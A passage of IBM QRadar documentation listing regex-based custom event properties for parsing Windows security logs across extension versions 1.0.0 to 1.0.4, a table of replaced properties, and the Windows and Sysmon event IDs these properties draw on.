Task Name[\:\s\\=]*\\(.*?)\s+(?:Task New Content:|&&)

Ticket Encryption Type Yes 1 Ticket Encryption Type[\s:\\=]*(0[xX][0-9a-fA-F]+)
User Domain No

No

No

No

No

No

1

1

1

1

1

1

Account Information:.*?Account Domain[\:\\\=\s]+([^\s]+)

Supplied Realm Name[:\s]+([^\s]+)

Caller Domain:\s+([^\s]+)

Subject.*?Domain[\:\\\=\s]{2,}([^\s]+)

User domain:\s+([^\s]+)

Primary Domain[:\s\\=]*([^\s]+)

User Principal Name No 1 User Principal Name[:\s]*(.*?)\s+Home Directory:
User Right No 1 User\sRight:\s+(.*?)\s+?(Assigned\sTo|Removed\sFrom):
User Workstations No 1 User Workstations[:\s]*(.*?)\s+Password Last Set:

The following custom event properties are removed from IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.4. The removal will not affect your environment. You can review your property usage and update to the replacement property as needed.

Table 21. Replaced custom properties in 1.0.4
Removed custom property Replaced by
Account Locked Out Account Name Target User Name
Account Locked Out Security ID Target Account Security ID
Account Logon Failed Account Domain Target User Domain
Account Logon Failed Account Name Target User Name
Account Logon Failed Security ID Target Account Security ID
AccountDomain User Domain
AccountName Initiator User Name
Caller Computer Name Computer Name
Caller Domain User Domain
Caller Process Name Process Path
File Filename

File Extension

Member Account Name Target User Name
Member Security ID Target Account Security ID
New Account Domain Target User Domain
New Account Name Target User Name
New Account Security ID Target Account Security ID
New Logon Account Domain Target User Domain
New Logon Account Name Target User Name
New Logon Security ID Target Account Security ID
New Process Name Process Name

The original property (New Process Name) returned the process path (directory and name together). The new property (Process Name) returns only the process name.

New Token Account Domain Target User Domain
New Token Account Name Target User Name
New Token Security ID Target Account Security ID
Primary Domain User Domain
Realm User Domain
Source Workstation Computer Name
Subject Account Domain User Domain
Subject Account Name Initiator User Name
Subject Security ID Account Security ID
Target Account Domain Target User Domain
Target Account Name Target User Name
Target Domain Target User Domain
Target Process Name Process Name

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1

The following table shows the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1.

Table 22. Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.1
Name Optimized Capture Group Regex
Accesses Yes 1 [\s\s|\t]Accesses:\s{0,2}(.*?)($|\s+(Access\s(Check\sResults|Mask|Reasons)|Privileges):)
Account Locked Out Account Name No 2 \s\sAccount\sThat\sWas\sLocked\sOut:\s\s+(.*?)\s\sAccount\sName:\s\s+(.*?)\s\s
Account Locked Out Security ID No 2 \s\sAccount\sThat\sWas\sLocked\sOut:(\s{2,3})Security\sID:\s\s(.*?)\s\s
Account Logon Failed Account Domain No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
Account Logon Failed Account Name No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
Account Logon Failed Security ID No 1 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s\sSecurity\sID:\s\s(.*?)\s\s
Account Security ID No 2 \s\sAccount\sInformation:\s\s(Security|.+User)\sID:\s+(.*?)\s\s
AccountDomain Yes 3 \s\sAccount\sInformation:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
AccountID Yes 1 Deprecated
AccountName Yes

Yes

Yes

1

1

1

Deprecated

Deprecated

Deprecated

Assigning Process Image File Name No 2 \s\sAssigning\sProcess\sInformation:\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
Caller Computer Name No 1 \s\sCaller\sComputer\sName:\s(.*?)(\s$|\t)
Caller Domain No 2 \sCaller\sDomain:(\s?)(.*?)\s(\s|Caller\sLogon\sID:)
Caller Process Name No 1 \s\sCaller\sProcess\sName:\s(.*?)\s\s
Caller User Name No 3 \sCaller\sUser(\sN|n)ame:(\s?)(.*?)\s(\s|Caller\sDomain:)
ChangedAttributes Yes 1 Changed\sAttributes:\s+(.*)
Client Domain No 2 \s\sClient\sDomain:(\s{0,2})(.*?)\s\s
Client User Name No 2 \s\sClient\sUser\sName:(\s{0,2})(.*?)\s\s
Computer No 7 (\tComputer=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t)(.*?)\t
Credentials Used Account Domain No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
Credentials Used Account Name No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:(\s{2,3})Account\sName:(\s{1,2})(.*?)\s\s
Domain No 4 (\s|Successful\sLogon:\s(.*?))\sDomain:(\s{1,2})(.*?)\s(\s|Logon\sID:)
Error Code No 8 (\s|[Mm]essage=)[Ee]rror(:|(\s([Cc]ode((\swas|\sreturned\s.+\sprocessor)?)(:?)|status:|value:|:)))\s?(.*?)([ .:,]|$)
Event ID Code No 1 \tEventIDCode=(.*?)\t
EventID Yes

Yes

Yes

1

1

1

\d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)

EventID=(\d+)

LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|

File No 3 (\s|,)\s[Ff]ile:(\s?)(.*?)(,\s|\sowned\sby)
Group Domain No

No

2

3

(\s|\t)Group\sDomain:\s*(.*?)(\s\s|\t)

\s(Target|Group)\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)

Group Name No

No

2

6

(\s|\t)Group\sName:\s*(.*?)(\t|\s(\s|Group\sDomain:))

\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain|Group\sDomain:)

Group Security ID No

No

3

3

(\s|\t)Group:(\s+|\t)Security\sID:\s*(.*?)(\s\s|\t)

\s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group):\s{1,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(|\s|Caller\sUser\sName:)

GroupID Yes 1 Group ID: (\d+)
Home Directory No 2 \s\sHome\sDirectory:(\s{1,2})(.*?)\s\s
Logon Type No 1 \sLogon\sType:\s+(\d+)(\s|$)
Member Account Name No 5 (\s|\t)Member(:(\s+?|\t).*?(\s+?|\t)Account)?\sName:\s*(.*?)(\t|\s+?(Group|Member\sID):)
Member Security ID No 4 (\s|\t)Member(:(\s+?|\t)Security)?\sID:\s*(.*?)(\t|(\s+?(Target\s)?Account\sName:))
Message No 1 (\t[Mm]essage=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(\t?))(.+)
New Account Domain No 6 \s\sNew\sAccount((\sName)?):\s(.*?)\s\s(Account|New)\sDomain:(\s{1,2})(.*?)\s\s
New Account Name No 5 \s\sNew\sAccount((:\s\s(.*?)\s\sAccount)?)\sName:(\s{1,2})(.*?)\s\s
New Account Security ID No 2 \s\sNew\sAccount(:\s{2,3}Security)?\sID:\s{1,2}(.*?)\s\s
New Logon Account Domain No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
New Logon Account Name No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sName:(\s{1,2})(.*?)\s\s
New Logon Security ID No 3 \s\sNew\sLogon:(\s{2,3})Security\sID:(\s{1,2})(.*?)\s\s
New Process Image File Name No 3 \s\s(New\sProcess\sInformation|A\snew\sprocess\shas\sbeen\screated):\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
New Process Name No 2 \sNew\sProcess\sName:(\s?)(.*?)\s(\s|Token\sElevation\sType:)
New Token Account Domain No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
New Token Account Name No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
New Token Security ID No 1 \s\sNew\sToken\sInformation:\s\sSecurity\sID:\s\s(.*?)\s\s
ObjectName Yes

Yes

1

1

Deprecated

Deprecated

ObjectType Yes 1 Object\sType:\s{0,2}(.*?)\s+(Object\sName|Process\sID|Source\sAddress):
Primary Domain No 2 \s\sPrimary\sDomain:(\s{0,2})(.*?)\s\s
Primary User Name No 2 \s\sPrimary\sUser\sName:(\s?)(.*?)\s\s
Process Name No 2 \s\sProcess\sName:\s(\s?)(.*?)(\s\s|$)
Realm Yes 1 Supplied Realm Name: (.*?)[ ]
Record Number No 1 \tRecordNumber=(.*?)\t
SAM Account Name No 2 \sS(AM|am)\sAccount\sName:\s?(.*?)\s(\s|SID\sHistory:)
Scope Yes 1 Scope:\s(.*?)\s+(\d+|$)
Secondary User Name No 1 \tSecondaryUserName=(.*?)\t
Service Name No 5 \s(\s|Service\sInformation:\s)(Service\sName|Server:\s\s(.*?)\s\sService):(\s{0,2})(.*?)\s(\s|Server:|Service\sFile\sName:)
Share Name No 2 \sShare\sName:(\s{0,2})(.*?)\s(\s|Share\sPath:)
Source Workstation Yes 6 (\sSource\sWorkstation|The\slogon\sto\saccount:\s(.*?)\sby:\s(.*?)\sfrom\sworkstation|(\s|Authentication\sPackage:\s(.*?))\sWorkstation\sName|Caller\sWorkstation):\s(.*?)\s(\s|Caller\sUser\sName:|Error\sCode:)
Subject Account Domain No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sDomain:(\s{0,2})(.*?)\s(\s|Logon\sID:)
Subject Account Name No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sName:(\s{0,2})(.*?)\s(\s|Account\sDomain:)
Subject Security ID No 5 (\s\s|\t)Subject(\s?):(\s{1,3})Security\sID:(\s{0,2})(.*?)\s(\s|Account\sName:)
Target Account Domain No 3 \s\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s\s(.*?)\s\sAccount\sDomain:\s{0,2}(.*?)(\s\s|\s$|\t)
Target Account Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain:)
Target Account Security ID No

No

3

2

\s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s{2,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(\s|Caller\sUser\sName:)

(Assigned\sTo|Removed\sFrom):\s*(.*?)\s+?(Assigned|Removed)\sBy:

Target Domain No 2 \sTarget\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)
Target Process Name No 1 \s\sTarget\sProcess\sName:\s(.*?)\s\s
Target User Name No 1 \s\sTarget\sUser\sName:\s(.*?)\s\s
User Account No 1 \sUser\saccount:\s(.*?)\sUser\sdomain:
User Domain No 2 \sUser\s[Dd]omain:(\s{1,2})(.*?)\s(\s|\w+:)
User Name No 3 (\s|:)\sUser\s[Nn]ame:(\s?)(.*?)\s(\s|\w+:)
User Principal Name No 1 \s\sUser\sPrincipal\sName:\s(.*?)\s\s
User Right No 1 User\sRight:\s*(.*?)\s+?(Assigned\sTo|Removed\sFrom|$):
User Workstations No 1 \s\sUser\sWorkstations:\s(.*?)\s\s

(Back to top)

IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0

The following table shows the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0.

Table 23. Custom Event Properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.0.0
Name Optimized Capture Group Regex
Accesses Yes 1 [\s\s|\t]Accesses:\s{0,2}(.*?)($|\s+(Access\s(Check\sResults|Mask|Reasons)|Privileges):)
Account Locked Out Account Name No 2 \s\sAccount\sThat\sWas\sLocked\sOut:\s\s+(.*?)\s\sAccount\sName:\s\s+(.*?)\s\s
Account Locked Out Security ID No 2 \s\sAccount\sThat\sWas\sLocked\sOut:(\s{2,3})Security\sID:\s\s(.*?)\s\s
Account Logon Failed Account Domain No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
Account Logon Failed Account Name No 2 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
Account Logon Failed Security ID No 1 \s\sAccount\sFor\sWhich\sLogon\sFailed:\s\s\sSecurity\sID:\s\s(.*?)\s\s
Account Security ID No 2 \s\sAccount\sInformation:\s\s(Security|.+User)\sID:\s+(.*?)\s\s
AccountDomain Yes 3 \s\sAccount\sInformation:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
AccountID Yes 1 Target Account ID: (.*?)
AccountName Yes

Yes

Yes

1

1

1

New Account Name: (.*?)

Target Account Name: (.*?)

Account Name:\s*(.+?)\s+(Additional Information|Account Domain|Service Information|SID History|Access Granted|Access Removed|Group|Display Name|Supplied Realm Name|Workstation|New Domain):

Assigning Process Image File Name No 2 \s\sAssigning\sProcess\sInformation:\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
Caller Computer Name No 1 \s\sCaller\sComputer\sName:\s(.*?)(\s$|\t)
Caller Domain No 2 \sCaller\sDomain:(\s?)(.*?)\s(\s|Caller\sLogon\sID:)
Caller Process Name No 1 \s\sCaller\sProcess\sName:\s(.*?)\s\s
Caller User Name No 3 \sCaller\sUser(\sN|n)ame:(\s?)(.*?)\s(\s|Caller\sDomain:)
ChangedAttributes Yes 1 Changed\sAttributes:\s+(.*)
Client Domain No 2 \s\sClient\sDomain:(\s{0,2})(.*?)\s\s
Client User Name No 2 \s\sClient\sUser\sName:(\s{0,2})(.*?)\s\s
Computer No 7 (\tComputer=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t)(.*?)\t
Credentials Used Account Domain No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
Credentials Used Account Name No 3 \s\sAccount\sWhose\sCredentials\sWere\sUsed:(\s{2,3})Account\sName:(\s{1,2})(.*?)\s\s
Domain No 4 (\s|Successful\sLogon:\s(.*?))\sDomain:(\s{1,2})(.*?)\s(\s|Logon\sID:)
Error Code No 8 (\s|[Mm]essage=)[Ee]rror(:|(\s([Cc]ode((\swas|\sreturned\s.+\sprocessor)?)(:?)|status:|value:|:)))\s?(.*?)([ .:,]|$)
Event ID Code No 1 \tEventIDCode=(.*?)\t
EventID Yes

Yes

Yes

1

1

1

\d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)

EventID=(\d+)

LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|

File No 3 (\s|,)\s[Ff]ile:(\s?)(.*?)(,\s|\sowned\sby)
Group Domain No

No

2

3

(\s|\t)Group\sDomain:\s*(.*?)(\s\s|\t)

\s(Target|Group)\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)

Group Name No

No

2

6

(\s|\t)Group\sName:\s*(.*?)(\t|\s(\s|Group\sDomain:))

\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain|Group\sDomain:)

Group Security ID No

No

3

3

(\s|\t)Group:(\s+|\t)Security\sID:\s*(.*?)(\s\s|\t)

\s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group):\s{1,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(|\s|Caller\sUser\sName:)

GroupID Yes 1 Group ID: (\d+)
Home Directory No 2 \s\sHome\sDirectory:(\s{1,2})(.*?)\s\s
Logon Type No 1 \sLogon\sType:\s+(\d+)(\s|$)
Member Account Name No 5 (\s|\t)Member(:(\s+?|\t).*?(\s+?|\t)Account)?\sName:\s*(.*?)(\t|\s+?(Group|Member\sID):)
Member Security ID No 4 (\s|\t)Member(:(\s+?|\t)Security)?\sID:\s*(.*?)(\t|(\s+?(Target\s)?Account\sName:))
Message No 10 (\t[Mm]essage=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(\t?))(.+)
New Account Domain No 6 \s\sNew\sAccount((\sName)?):\s(.*?)\s\s(Account|New)\sDomain:(\s{1,2})(.*?)\s\s
New Account Name No 5 \s\sNew\sAccount((:\s\s(.*?)\s\sAccount)?)\sName:(\s{1,2})(.*?)\s\s
New Account Security ID No 2 \s\sNew\sAccount(:\s{2,3}Security)?\sID:\s{1,2}(.*?)\s\s
New Logon Account Domain No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
New Logon Account Name No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sName:(\s{1,2})(.*?)\s\s
New Logon Security ID No 3 \s\sNew\sLogon:(\s{2,3})Security\sID:(\s{1,2})(.*?)\s\s
New Process Image File Name No 3 \s\s(New\sProcess\sInformation|A\snew\sprocess\shas\sbeen\screated):\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
New Process Name No 2 \sNew\sProcess\sName:(\s?)(.*?)\s(\s|Token\sElevation\sType:)
New Token Account Domain No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
New Token Account Name No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
New Token Security ID No 1 \s\sNew\sToken\sInformation:\s\sSecurity\sID:\s\s(.*?)\s\s
ObjectName Yes

Yes

1

1

Object Name: (.*?)

New Process Name: (.*?)

ObjectType Yes 1 Object\sType:\s{0,2}(.*?)\s+(Object\sName|Process\sID|Source\sAddress):
Primary Domain No 2 \s\sPrimary\sDomain:(\s{0,2})(.*?)\s\s
Primary User Name No 2 \s\sPrimary\sUser\sName:(\s?)(.*?)\s\s
Process Name No 2 \s\sProcess\sName:\s(\s?)(.*?)(\s\s|$)
Realm Yes 1 Supplied Realm Name: (.*?)[ ]
Record Number No 1 \tRecordNumber=(.*?)\t
SAM Account Name No 2 \sS(AM|am)\sAccount\sName:\s?(.*?)\s(\s|SID\sHistory:)
Scope Yes 1 Scope:\s(.*?)\s+(\d+|$)
Secondary User Name No 1 \tSecondaryUserName=(.*?)\t
Service Name No 5 \s(\s|Service\sInformation:\s)(Service\sName|Server:\s\s(.*?)\s\sService):(\s{0,2})(.*?)\s(\s|Server:|Service\sFile\sName:)
Share Name No 2 \sShare\sName:(\s{0,2})(.*?)\s(\s|Share\sPath:)
Source Workstation Yes 6 (\sSource\sWorkstation|The\slogon\sto\saccount:\s(.*?)\sby:\s(.*?)\sfrom\sworkstation|(\s|Authentication\sPackage:\s(.*?))\sWorkstation\sName|Caller\sWorkstation):\s(.*?)\s(\s|Caller\sUser\sName:|Error\sCode:)
Subject Account Domain No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sDomain:(\s{0,2})(.*?)\s(\s|Logon\sID:)
Subject Account Name No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sName:(\s{0,2})(.*?)\s(\s|Account\sDomain:)
Subject Security ID No 5 (\s\s|\t)Subject(\s?):(\s{1,3})Security\sID:(\s{0,2})(.*?)\s(\s|Account\sName:)
Target Account Domain No 3 \s\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s\s(.*?)\s\sAccount\sDomain:\s{0,2}(.*?)(\s\s|\s$|\t)
Target Account Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain:)
Target Account Security ID No

No

3

2

\s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s{2,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(\s|Caller\sUser\sName:)

(Assigned\sTo|Removed\sFrom):\s*(.*?)\s+?(Assigned|Removed)\sBy:

Target Domain No 2 \sTarget\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)
Target Process Name No 1 \s\sTarget\sProcess\sName:\s(.*?)\s\s
Target User Name No 1 \s\sTarget\sUser\sName:\s(.*?)\s\s
User Account No 1 \sUser\saccount:\s(.*?)\sUser\sdomain:
User Domain No 2 \sUser\s[Dd]omain:(\s{1,2})(.*?)\s(\s|\w+:)
User Name No 3 (\s|:)\sUser\s[Nn]ame:(\s?)(.*?)\s(\s|\w+:)
User Principal Name No 1 \s\sUser\sPrincipal\sName:\s(.*?)\s\s
User Right No 1 User\sRight:\s*(.*?)\s+?(Assigned\sTo|Removed\sFrom|$):
User Workstations No 1 \s\sUser\sWorkstations:\s(.*?)\s\s

(Back to top)

The following table shows the event ID's and event names which the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension are based on

Table 24. Event ID's in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1
Event ID Event Name
1 Process Create
2 A process changed a file creation time
3 Network connection detected
5 Process terminated
7 Image loaded
8 Create RemoteThread
10 ProcessAccess
11 FileCreate
13 Registry Event (Value Set)
15 FileCreateStreamHash
22 DNS Query
23 File Delete
513 Success Audit: A user account was created
537 Logon failure - The Logon attempt failed for other reasons
627 Success Audit: Change Password Attempt Succeeded
631 Group Created
632 Global Group Member Added
634 Group Deleted
636 Local Group Member Added
637 Local Group Member Removed
850 Windows Firewall Configuration
4103 Module Logging Command Invocation
4104 Script Block Executed/Compiled
4624 Success Audit: An account was successfully logged on
4625 Failure Audit: An account failed to log on
4648 Success Audit: A logon was successful using explicit credentials
4656 Failure Audit: A handle to an object was requested
4657 Success Audit: A registry value was modified
4662 Success Audit: An operation was performed on an object
4663 Success Audit: An attempt was made to access an object
4670 Success Audit: Permissions on an object were changed
4688 Success Audit: A new process has been created
4689 Success Audit: A process has exited
4696 Success Audit: A primary token was assigned to process
4698 Success Audit: A scheduled task was created
4702 Success Audit: A scheduled task was updated
4720 Success Audit: A user account was created
4723 Success Audit: An attempt was made to change an account's password
4725 Success Audit: A user account was disabled
4726 A user account was deleted
4727 Success Audit: A security-enabled global group was created
4728 Success Audit: A member was added to a security-enabled global group
4729 Success Audit: A member was removed from a security-enabled global group
4730 Success Audit: A security-enabled global group was deleted
4732 Success Audit: A member was added to a security-enabled local group
4733 Success Audit: A member was removed from a security-enabled local group
4735 Success Audit: A security-enabled local group was changed
4737 Success Audit: A security-enabled global group was changed
4738 Success Audit: A user account was changed
4740 Success Audit: A user account was locked out
4741 Success Audit: A computer account was created
4742 Success Audit: A computer account was changed
4743 Success Audit: A computer account was deleted
4754 Success Audit: A security-enabled universal group was created
4755 Success Audit: A security-enabled universal group was changed
4756 Success Audit: A member was added to a security-enabled universal group
4761 Success Audit: A member was added to a security-disabled universal group
4762 Success Audit: A member was removed from a security-disabled universal group
4767 Success Audit: A user account was unlocked
4768 Success Audit: A Kerberos authentication ticket (TGT) was requested
4769 Failure Audit: A Kerberos service ticket was rejected
5140 A network share object was accessed
5142 Network Share Object Added
5145 Success Audit: Network Share Object Checked for Access

(Back to top)